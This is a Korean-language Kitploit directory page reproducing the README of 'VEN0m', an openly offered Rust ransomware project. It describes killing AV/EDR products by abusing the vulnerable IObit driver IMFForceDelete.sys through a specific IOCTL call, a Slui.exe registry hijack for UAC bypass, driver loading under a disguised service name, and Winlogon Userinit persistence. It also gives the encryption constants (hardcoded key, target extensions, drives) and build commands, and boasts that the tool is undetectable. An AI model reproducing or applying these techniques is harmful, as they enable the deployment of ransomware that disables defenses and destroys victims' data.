Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
VEN0m-Ransomware — Rust로 작성된 완전히 탐지 불가능하고 회피적인 랜섬웨어로, BYOVD 기법을 활용하여 감염된 시스템의 AV/EDR 솔루션을 비활성화합니다. | Kitploit
도구/GitHubGitHub/xm0kht4r/ven0m-ransomware
Privilege EscalationEncryption/Decryption ToolsPersistence MechanismsExploitationIDS/IPS EvasionPost-ExploitationMalware AnalysisRed TeamingPayload Development
GitHubxm0kht4r/ven0m-ransomware

VEN0m-Ransomware

Rust로 작성된 완전히 탐지 불가능하고 회피적인 랜섬웨어로, BYOVD 기법을 활용하여 감염된 시스템의 AV/EDR 솔루션을 비활성화합니다.

3678826개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

VEN0m 랜섬웨어

https://github.com/user-attachments/assets/5a1fc9b5-a647-41f6-a152-7b9d97381adc

이 프로젝트는 합법적이고 서명된 드라이버가 무기화되어 방어 체계를 우회하고 실제 사이버 공격을 시뮬레이션하는 랜섬웨어를 배포하는 방법을 보여줍니다.

🚨 Windows 11 Pro 24H2에서 테스트 완료. 최초 릴리스 날짜(2026-02-23) 기준으로 완전히 탐지되지 않습니다.

우회UAC 우회
BitDefender✅✅
Kaspersky✅✅
MS Defender✅❌

주요 기능

AV/EDR 우회:

VEN0m은 고전적인 BYOVD 기법을 사용하지만, 커널 함수 ZwTerminateProcess를 권한 없는 사용자에게 노출하는 취약한 드라이버를 악용하는 AV-EDR-KILLER와 달리, IObit Malware Fighter v12.1.0에 포함된 취약한 드라이버를 활용합니다. 이는 방어를 우회하는 데 사용하면서 아이러니합니다.

문제의 드라이버는 IMFForceDelete.sys로, 권한 없는 사용자가 임의로 파일을 삭제할 수 있게 하는 IOCTL을 노출합니다. 이 취약점은 CVE-2025-26125로 추적되며, 해당 드라이버는 아직 Microsoft의 차단 목록에 포함되지 않았습니다.

임의 삭제를 트리거하려면 IOCTL 코드 0x8016E000, 대상 파일을 나타내는 와이드 유니코드 문자열에 대한 긴 void 포인터, 그리고 (wstr_file.len()은 u16 요소 수를 제공하고 각 요소는 2바이트이므로) 해당 요소 수에 2를 곱한 총 길이를 u32로 캐스팅하여 API 호출 규칙의 DWORD 매개변수에 맞게 DeviceIoControl API 호출을 호출하면 됩니다.

root@kitploit:~
> DeviceIoControl(hDriver, 0x8016E000, wstr_file.as_ptr() as LPVOID, (wstr_file.len() * 2) as u32, ptr::null_mut(), 0, &mut bytes_returned, ptr::null_mut())

[!NOTE]

+ ❓ AV-EDR-Killer가 특정 AV/EDR 제품에 대해 실패한 이유는 무엇인가요?

기본 아이디어는 보호되지 않은 IOCTL을 통해 커널 함수 ZwTerminateProcess를 노출하는 드라이버를 악용하여 모든 사용자 모드 애플리케이션에 커널 수준의 종료 기능을 부여하는 것이었습니다. 이 기법의 약점은 일부 AV/EDR 제품이 해당 함수를 후킹하여 호출을 가로챌 수 있다는 점입니다.

또 다른 주목할 만한 기법은 특정 취약한 드라이버의 임의 읽기/쓰기 프리미티브를 악용하여 메모리를 패치하고, ntoskrnl.exe 자체에서 내보내지 않는 더 강력한 종료 함수 PsTerminateProcess로 점프하는 것이었습니다. 이는 호스트 방어 시스템이 지속적으로 메모리를 스캔하고 있기 때문에 매우 의심스럽습니다. 참고 : https://securelist.com/av-killer-exploiting-throttlestop-sys/117026/

+ 새로운 점은?

간단히 설치 폴더와 디스크의 실행 파일을 파괴합니다. 그렇게 간단합니다!

이는 대부분의 방어 제품에 사각지대인 것으로 보입니다. 메모리를 조작하거나 의심스러운 호출을 하는 대신 디스크의 파일을 대상으로 하기 때문입니다. IMFForceDelete.sys 드라이버를 사용하여 잠긴 파일을 높은 권한으로 강제 삭제할 수 있습니다. AV 또는 EDR 제품을 직접 공격하는 것은 일반적으로 방어 체계를 우회하기 위해 은밀함을 추구하는 공격자에게는 직관에 반하는 것처럼 들립니다.

이 기법을 사용하여 실행 중인 EDR/AV 프로세스를 손상시켜 서서히 망가지고 제대로 작동하지 않도록 만들었으며, 이로 인해 혼란을 일으키고 선택한 페이로드인 VEN0m을 배포할 수 있는 통로가 열렸습니다.

  • 상수 TARGETS를 수정하여 대상 AV/EDR 목록을 확장하거나 조정할 수 있습니다:
root@kitploit:~
const TARGETS: &[&str] = &[r"C:\Program Files (x86)\Kaspersky Lab", r"C:\Program Files\Bitdefender", r"C:\Program Files\Bitdefender Agent", r"C:\Program Files\Windows Defender",];

UAC 우회:

UAC 프롬프트를 우회하기 위해, 관리자 컨텍스트에서 runas 동사로 호출될 때 프롬프트를 트리거하지 않고 자동 승격을 지원하는 서명된 Microsoft 바이너리 Slui.exe의 실행 흐름을 하이재킹합니다.

핵심 악용은 Slui.exe가 HKCU\Software\Classes\Launcher.SystemSettings\Shell\Open\Command 아래에 존재하지 않는 레지스트리 키를 열려고 시도할 때 발생합니다. 우리는 이 결함을 이용하여 누락된 키를 생성하고 DelegateExecute를 삽입하여 실행을 위임하고 현재 페이로드를 가리키도록 합니다. 그런 다음 ShellExecuteW API 호출과 runas 동사를 사용하여 Slui.exe의 실행을 트리거하여 성공적인 UAC 우회를 달성합니다. 전체 구현은 /src/uac.rs에서 찾을 수 있습니다.

[!IMPORTANT] 이것이 보고되어야 할 취약점인지 확실하지 않습니다. 그렇다면 아래에 기재된 이메일로 연락 주시기 바랍니다.

드라이버 로딩:

VEN0m은 UAC를 우회하고 높은 무결성으로 실행되므로, 포함된 드라이버를 임시 폴더로 추출하고 MicrosoftUpdate11.01과 같은 위장된 이름으로 커널 서비스를 생성하는 과정을 자동화합니다. 서비스가 중지되면 자동으로 시작하거나 이미 존재하면 생성하지 않는 매우 편리한 검사 기능이 포함되어 있습니다.

지속성:

호스트 방어가 무력화된 후에는 원하는 지속성 기법을 선택할 수 있습니다. 저는 간단한 Winlogon Userinit 기법을 사용했습니다. 이 기법은 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 아래의 Userinit 레지스트리 키를 활용합니다. 기본적으로 이 키는 userinit.exe를 값으로 지정하며, 사용자 로그인 시 실행되어 사용자 환경을 초기화합니다. 그러나 우리는 합법적인 userinit.exe 뒤에 쉼표로 구분하여 페이로드 경로를 추가하는 방식으로 이를 하이재킹하고, 동시에 %LOCALAPPDATA%에 악성코드 사본을 드롭합니다.

암호화:

랜섬웨어는 지정된 드라이브에서 제외 목록을 필터링하면서 대상 확장자를 가진 파일을 스캔합니다. 일치하는 파일은 32바이트 하드코딩된 키를 사용하여 암호화되고 확장자가 .vnm으로 변경됩니다.

다음 상수를 수정하여 동작을 사용자 정의할 수 있습니다:

  • KEY - 암호화 키 지정:
root@kitploit:~
const KEY: &[u8; 32] = b"G7m9Xq2vR4pL8bF1sW0cZ6kD3jN5yH8u";
  • XClUSIONS - 제외할 디렉터리 및 폴더 지정:
root@kitploit:~
const XClUSIONS: &[&str] = &["Windows", "Program Files", "Program Files (x86)", "ProgramData", "$Recycle.Bin", "All Users"];
  • XTENSIONS - 대상 확장자 목록 확장 또는 조정:
root@kitploit:~
const XTENSIONS: &[&str] = &["pdf", "doc", "xlms", "png", "jpg", "jpeg", "txt", "mp4"];
  • DRV - 대상 드라이브 지정:
root@kitploit:~
const DRV: &[&str] = &["C:\\", "D:\\", "E:\\", "F:\\"];

랜섬 노트:

암호화가 완료되면 VEN0m은 바탕 화면 배경을 변경하고 실행 가능한 랜섬 노트를 바탕 화면에 드롭합니다. 또한 몇 분마다 실행되어 노트 GUI를 실행하는 예약된 작업을 등록하며, 이 GUI는 반짝이는 해골 ☠️을 표시합니다.

  • /assets/wallpaper.jpg를 원하는 이미지로 교체하여 배경 화면을 사용자 정의할 수 있습니다.
  • /src/task.rs를 편집하여 예약된 작업 속성을 수정할 수 있습니다.

복호화 도구:

VEN0m에는 복호화 도구 Antid0te.exe🧪도 포함되어 있습니다. 이 도구는 확장자 .vnm이 있는 파일을 스캔하고 암호화에 사용된 동일한 키를 사용하여 암호화 루틴을 역전시킵니다.

[!WARNING] Antid0te.exe 복호화 도구를 사용하여 파일을 복호화할 수 있도록 암호화 키를 저장하는 것이 중요합니다.

사용자 정의:

VEN0m은 고도로 모듈화되어 있으며 사용자 정의가 가능합니다. 하드코딩된 상수를 수정하여 랜섬웨어의 동작을 변경할 수 있습니다. 또한 원하는 권한 상승 취약점 또는 측면 이동 기법과 결합하여 한 단계 더 발전시킬 수 있습니다 :)

사용법:

  1. .ico 아이콘과 사용자 정의 배경 화면을 /assets 안에 배치합니다.
  2. 바이너리 컴파일:
root@kitploit:~
> cargo build --release --bin Note --features 1
> cargo build --release --bin Antid0te --features 2
> cargo build --release --bin VEN0m

🔒 면책 조항

[!CAUTION] 이 도구를 사용하기 전에 적절한 권한이 있는지 확인하는 것은 사용자의 책임입니다. 작성자는 오용에 대해 어떠한 책임도 지지 않습니다.

🤝 협업

기여와 제안을 환영합니다! "윤리적인" 비즈니스 문의나 협업을 원하시면 [email protected]으로 연락 주시기 바랍니다.

❤️로 제작됨, Petya, WannaCry 및 공동 작업자들에게서 영감을 받음.

VEN0m은 제 여정에 영향을 준 검은 길고양이입니다.

도구 다운로드